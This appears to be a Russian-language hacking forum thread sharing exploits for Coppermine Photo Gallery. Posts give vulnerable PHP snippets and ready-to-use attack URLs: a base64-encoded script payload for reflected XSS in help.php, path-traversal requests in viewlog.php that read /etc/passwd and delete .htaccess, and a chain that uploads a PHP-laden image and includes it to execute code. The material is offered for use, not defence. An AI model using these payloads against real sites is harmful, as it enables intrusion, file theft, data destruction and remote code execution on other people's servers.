Coppermine Photo Gallery

asddas · 05.08.2010, 14:59

Продукт: Coppermine Photo Gallery 1.5 <= 1.5.10 Passive XSS
Офф сайт: coppermine-gallery.net
Зависимости: Нет
Уязвимые файлы: /help.php
Уязвимый кусок кода:

PHP код:


			
if ($base != '') {

    // content of header and text have been base64-encoded - decode it now

    $header = @unserialize(@base64_decode($header));





                . . . . . . . . . . .





if ($header != '') {

    $content = '<h1>'.$header.'</h1>';

    $content .= $text;

} else {

    $content = '';

}

Exploit:
http://coppermine-gallery.net/demo/cpg15x/help.php?base=1&h=czozMjoiPHNjcmlwdD5hbGVydCgnaGVo ZWhlJyk8L3NjcmlwdD4iOz==

asddas · 29.12.2010, 00:31

http://www.securitylab.ru/vulnerability/403723.php
http://www.waraxe.us/advisory-79.html
Спалили

vp$ · 25.09.2013, 11:00

Coppermine Photo Gallery <= 1.4.6
Зависимость : права админа
может быть и более поздние
LFI в админке

уязвимый код

Код:

$log = @$_GET['log'];
$action = @$_GET['action'];

pageheader('Logs :: '.$log);
.....................................

if (!isset($log)) {
        display_log_list();
} else {
               display_log($log);
}
.................................
function display_log($logname)
{
..................
log_read($logname);
........................
}

...............................
function log_read( $log = null ) {
        if (is_null($log)) {
                $log = CPG_GLOBAL_LOG;
        }

        $log = 'logs/'.$log.'.log.php';

        @include($log);
}

POC

Цитата:

cpg146/viewlog.php?log=../../../../../../../../etc/passwd%00

---------------------------
здесь же, удаление произвольного файла

Цитата:

cpg146/viewlog.php?action=dthis&log=../.htaccess%00

--------------------------------------
epic win

+ в конфиге выбираем обработчик изображений ImageMagick
+ загружаем фотку с php кодом, несмотря на то что админка скажет, что картинка не добавлена, она все равно зальется в альбом юзера
+ cpg146/viewlog.php?log=../albums/userpics/10001/evil.jpg%00 выполняется код

а на десерт, листинг директорий
cpg146/minibrowser.php?folder=/

nomad · 23.08.2014, 21:46

Заливка шелла в 1.4.16 (проверено)

05.08.2010, 14:59	#1
asddas Регистрация: 04.08.2010 Сообщений: 153 Репутация: 161	Coppermine Photo Gallery Продукт: Coppermine Photo Gallery 1.5 <= 1.5.10 Passive XSS Офф сайт: coppermine-gallery.net Зависимости: Нет Уязвимые файлы: /help.php Уязвимый кусок кода: PHP код: `if ($base != '') { // content of header and text have been base64-encoded - decode it now $header = @unserialize(@base64_decode($header)); . . . . . . . . . . . if ($header != '') { $content = '<h1>'.$header.'</h1>'; $content .= $text; } else { $content = ''; }` Exploit: http://coppermine-gallery.net/demo/cpg15x/help.php?base=1&h=czozMjoiPHNjcmlwdD5hbGVydCgnaGVo ZWhlJyk8L3NjcmlwdD4iOz== Последний раз редактировалось asddas; 29.12.2010 в 00:32.. Причина: изменение заголовка

23.08.2014, 21:46	#4
nomad Регистрация: 23.07.2010 Сообщений: 179 Репутация: 7	Заливка шелла в 1.4.16 (проверено) __________________ Roamer, wanderer Nomad, vagabond Call me what you will (c) Metallica

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

29.12.2010, 00:31	#2
asddas Регистрация: 04.08.2010 Сообщений: 153 Репутация: 161	http://www.securitylab.ru/vulnerability/403723.php http://www.waraxe.us/advisory-79.html Спалили